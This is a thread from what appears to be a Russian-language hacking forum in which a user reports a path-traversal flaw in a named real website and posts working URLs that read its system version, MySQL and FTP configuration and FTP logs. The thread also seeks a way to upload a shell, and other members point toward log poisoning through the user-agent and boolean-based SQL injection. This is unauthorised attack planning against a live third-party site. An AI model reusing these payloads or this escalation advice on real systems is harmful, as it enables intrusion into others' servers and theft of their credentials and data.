12.02.2018, 14:54
|
|
Флудер
Регистрация: 19.06.2015
Сообщений: 4,126
Провел на форуме:
759330
Репутация:
147
|
|
Сообщение от man474019
↑
and, what can do in this situation ?
Try boolean-based via more than 1 row )
|
|
|
12.02.2018, 15:00
|
|
Постоянный
Регистрация: 14.06.2015
Сообщений: 396
Провел на форуме:
104689
Репутация:
1
|
|
|
|
|
|
12.02.2018, 15:27
|
|
Новичок
Регистрация: 14.10.2017
Сообщений: 10
Провел на форуме:
2312
Репутация:
0
|
|
|
|
|
|
14.02.2018, 14:51
|
|
Новичок
Регистрация: 30.06.2013
Сообщений: 12
Провел на форуме:
4001
Репутация:
0
|
|
Итак, есть сайт enature.net, он не очень хороший и вообще сами можете тематику посмотреть. Весьма легальный, работает с 95-го года.
Нашел LFI через сканер (netsparker), до этого дел с PHP-include не имел, выглядит примерно так:
Код:
https://www.enature.net/nudist_gallery/full_image/?param=/../../../../../../../../../../proc/version
Что нашел:
- конфиг мускула
Код:
https://www.enature.net/nudist_gallery/full_image/?page=/../../../../../../../../../../etc/mysql/my.cnf
- конфиг фтп
Код:
https://www.enature.net/nudist_gallery/full_image/?page=/../../../../../../../../../../etc/protpd/proftpd.conf
- логи фтп (не нашел подключения)
Код:
https://www.enature.net/nudist_gallery/full_image/?page=/../../../../../../../../../../var/log/xferlog
https://www.enature.net/nudist_gallery/full_image/?page=/../../../../../../../../../../var/log/cdninvalidate.log
Что не могу найти:
- логи апача
- способ залиться |
|
|
|
14.02.2018, 14:55
|
|
Постоянный
Регистрация: 14.06.2015
Сообщений: 396
Провел на форуме:
104689
Репутация:
1
|
|
Сообщение от z3u5
↑
Итак, есть сайт enature.net, он не очень хороший и вообще сами можете тематику посмотреть. Весьма легальный, работает с 95-го года.
Нашел LFI через сканер (netsparker), до этого дел с PHP-include не имел, выглядит примерно так:
Код:
https://www.enature.net/nudist_gallery/full_image/?param=/../../../../../../../../../../proc/version
Что нашел:
- конфиг мускула
Код:
https://www.enature.net/nudist_gallery/full_image/?page=/../../../../../../../../../../etc/mysql/my.cnf
- конфиг фтп
Код:
https://www.enature.net/nudist_gallery/full_image/?page=/../../../../../../../../../../etc/protpd/proftpd.conf
- логи фтп (не нашел подключения)
Код:
https://www.enature.net/nudist_gallery/full_image/?page=/../../../../../../../../../../var/log/xferlog
https://www.enature.net/nudist_gallery/full_image/?page=/../../../../../../../../../../var/log/cdninvalidate.log
Что не могу найти:
- логи апача
- способ залиться
чёт не фурычит сайт )
|
|
|
|
14.02.2018, 14:58
|
|
Новичок
Регистрация: 30.06.2013
Сообщений: 12
Провел на форуме:
4001
Репутация:
0
|
|
С СНГ IP может не пускать.
Забыл поздороваться и попросить помощи, ну вы поняли. Ковырял часа 4 к ряду, уже хз, может просто не разрешает читать логи (но при этом разрешает конфиги?)
|
|
|
|
14.02.2018, 15:23
|
|
Постоянный
Регистрация: 18.03.2016
Сообщений: 663
Провел на форуме:
169212
Репутация:
441
|
|
Сообщение от z3u5
↑
Нашел LFI через сканер (netsparker)
Ниразу не LFI, это читалка. На чтение логов нет прав.
|
|
|
|
14.02.2018, 15:30
|
|
Новичок
Регистрация: 30.06.2013
Сообщений: 12
Провел на форуме:
4001
Репутация:
0
|
|
Сообщение от crlf
↑
Ниразу не LFI, это читалка. На чтение логов нет прав.
Опять эти корпоративные свиньи пугают уязвимостями чтобы я купил лицуху сканера.
Спасибо, как читалку отличить от инклуда? Пускать в логи должно?
|
|
|
|
14.02.2018, 15:33
|
|
Флудер
Регистрация: 19.06.2015
Сообщений: 4,126
Провел на форуме:
759330
Репутация:
147
|
|
Сообщение от z3u5
↑
Спасибо, как читалку отличить от инклуда? Пускать в логи должно?
код должен выполняться?
|
|
|
|
14.02.2018, 15:38
|
|
Новичок
Регистрация: 30.06.2013
Сообщений: 12
Провел на форуме:
4001
Репутация:
0
|
|
Сообщение от ms13
↑
код должен выполняться?
Ну хорошо, но чтобы он выполнился нужно всунуть в логи, правильно? То-есть там через юзерагент, логины и прочие пляски. Или есть еще варианты?
Я не в теме, пишу без наездов, вам все кажется.
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Комбинированный вид
